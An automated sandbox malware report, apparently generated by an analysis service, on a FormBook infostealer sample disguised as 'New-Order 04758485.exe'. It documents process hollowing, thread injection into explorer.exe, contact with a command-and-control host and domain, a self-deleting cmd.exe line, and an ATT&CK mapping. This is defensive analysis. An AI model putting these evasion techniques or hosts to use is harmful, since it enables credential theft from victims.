          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DDEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DCD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\New-Order 04758485.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 3.16.197.4 80
          Source: C:\Windows\explorer.exeDomain query: www.iqomw.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\New-Order 04758485.exeMemory written: C:\Users\user\Desktop\New-Order 04758485.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\New-Order 04758485.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\New-Order 04758485.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\New-Order 04758485.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\New-Order 04758485.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\New-Order 04758485.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\New-Order 04758485.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: E60000
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess created: C:\Users\user\Desktop\New-Order 04758485.exe C:\Users\user\Desktop\New-Order 04758485.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New-Order 04758485.exe'
          Source: explorer.exe, 0000000B.00000000.306763904.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 0000000B.00000000.307247643.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000C.00000002.473948836.0000000003410000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000B.00000000.307247643.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000C.00000002.473948836.0000000003410000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.307247643.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000C.00000002.473948836.0000000003410000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.307247643.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000C.00000002.473948836.0000000003410000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\New-Order 04758485.exeQueries volume information: C:\Users\user\Desktop\New-Order 04758485.exe VolumeInformation
          Source: C:\Users\user\Desktop\New-Order 04758485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\New-Order 04758485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\New-Order 04758485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\New-Order 04758485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\New-Order 04758485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\New-Order 04758485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\New-Order 04758485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms.DataVisualization\v4.0_4.0.0.0__31bf3856ad364e35\System.Windows.Forms.DataVisualization.dll VolumeInformation
          Source: C:\Users\user\Desktop\New-Order 04758485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
          Source: C:\Users\user\Desktop\New-Order 04758485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\New-Order 04758485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D26D90 GetVersion,GetVersion,
          Source: C:\Users\user\Desktop\New-Order 04758485.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.474310455.0000000004920000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.307323456.0000000003AFA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.342960367.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.342980918.00000000011D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.474480183.0000000004950000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.307802950.0000000003BDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.472057276.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.307176477.0000000003A97000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.New-Order 04758485.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.New-Order 04758485.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.474310455.0000000004920000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.307323456.0000000003AFA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.342960367.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.342980918.00000000011D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.474480183.0000000004950000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.307802950.0000000003BDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.472057276.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.307176477.0000000003A97000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.New-Order 04758485.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.New-Order 04758485.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Shared Modules1Valid Accounts1Valid Accounts1Rootkit1Credential API Hooking1Security Software Discovery121Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation1Masquerading1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Process Injection612Valid Accounts1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDisable or Modify Tools1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion31Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection612DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDeobfuscate/Decode Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Obfuscated Files or Information3Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronSoftware Packing1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 412322 Sample: New-Order 04758485.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 32 www.elzooz.com 2->32 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 5 other signatures 2->42 11 New-Order 04758485.exe 15 3 2->11         started        signatures3 process4 signatures5 50 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->50 52 Injects a PE file into a foreign processes 11->52 14 New-Order 04758485.exe 11->14         started        process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Sample uses process hollowing technique 14->58 60 Queues an APC in another process (thread injection) 14->60 17 explorer.exe 14->17 injected process8 dnsIp9 28 www.iqomw.com 17->28 30 prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com 3.16.197.4, 49707, 80 AMAZON-02US United States 17->30 34 System process connects to network (likely due to code injection or exploit) 17->34 21 cmmon32.exe 17->21         started        signatures10 process11 signatures12 44 Modifies the context of a thread in another process (thread injection) 21->44 46 Maps a DLL or memory area into another process 21->46 48 Tries to detect virtualization through RDTSC time measurements 21->48 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.2.New-Order 04758485.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.iqomw.com0%VirustotalBrowse
          www.elzooz.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://ns.adobe.co0%VirustotalBrowse
          http://ns.adobe.co0%Avira URL Cloudsafe
          http://ns.adobe.c/gO0%Avira URL Cloudsafe
          http://purl.r0%Avira URL Cloudsafe
